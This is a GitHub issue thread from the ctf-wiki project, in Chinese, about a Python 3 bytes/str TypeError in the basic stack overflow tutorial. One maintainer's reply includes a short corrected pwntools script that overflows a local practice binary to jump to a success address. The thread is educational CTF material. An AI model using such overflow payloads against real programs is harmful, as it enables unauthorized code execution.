### ISSUE TITLE
TypeError: can only concatenate str (not "bytes") to str 

### ISSUE THREAD

**Issue by james-ma** [ctf-wiki/ctf-wiki#888]
ctf-wiki/docs/zh/docs/pwn/linux/user-mode/stackoverflow/x86 /stackoverflow-basic.md  中执行 p32(success_addr) 和字符串拼接的时候报错。  我应该怎么改进呢？ 

payload = 'a' * 0x14 + 'bbbb' + p32(success_addr)
---------------------------------------------------------------------------
TypeError                                 Traceback (most recent call last)
Cell In[5], line 1
----> 1 payload = 'a' * 0x14 + 'bbbb' + p32(success_addr)

TypeError: can only concatenate str (not "bytes") to str

**Comment by iromise** [comment]
@james-ma 这个脚本之前应该是用 python2 写的。你可以把改成 python3。

**Comment by arttnba3** [comment]
脚本编写年代较为久远（当时主流还是python2 ），你可以先自行将其更改为 Python3 的写法：

```python
##coding=utf8
from pwn import *
## 构造与程序交互的对象
sh = process('./stack_example')
success_addr = 0x0804843b
## 构造payload
payload = b'a' * 0x14 + b'bbbb' + p32(success_addr)
print(p32(success_addr))
## 向程序发送字符串
sh.sendline(payload)
## 将代码交互转换为手工交互
sh.interactive()
```

Wiki 组将择日进行相关脚本的更新。

**Comment by WinMin** [comment]
> ctf-wiki/docs/zh/docs/pwn/linux/user-mode/stackoverflow/x86 /stackoverflow-basic.md 中执行 p32(success_addr) 和字符串拼接的时候报错。 我应该怎么改进呢？
> 
> ## payload = 'a' * 0x14 + 'bbbb' + p32(success_addr)
> TypeError Traceback (most recent call last) Cell In[5], line 1 ----> 1 payload = 'a' * 0x14 + 'bbbb' + p32(success_addr)
> 
> TypeError: can only concatenate str (not "bytes") to str

#https://github.com/ctf-wiki/ctf-wiki/commit/6dbb7ed2eb5c08f999521a16e5cccbb584f6fc45  关于这个文件的代码已经修改, 具体修改也可以参考上面 @arttnba3 的回复
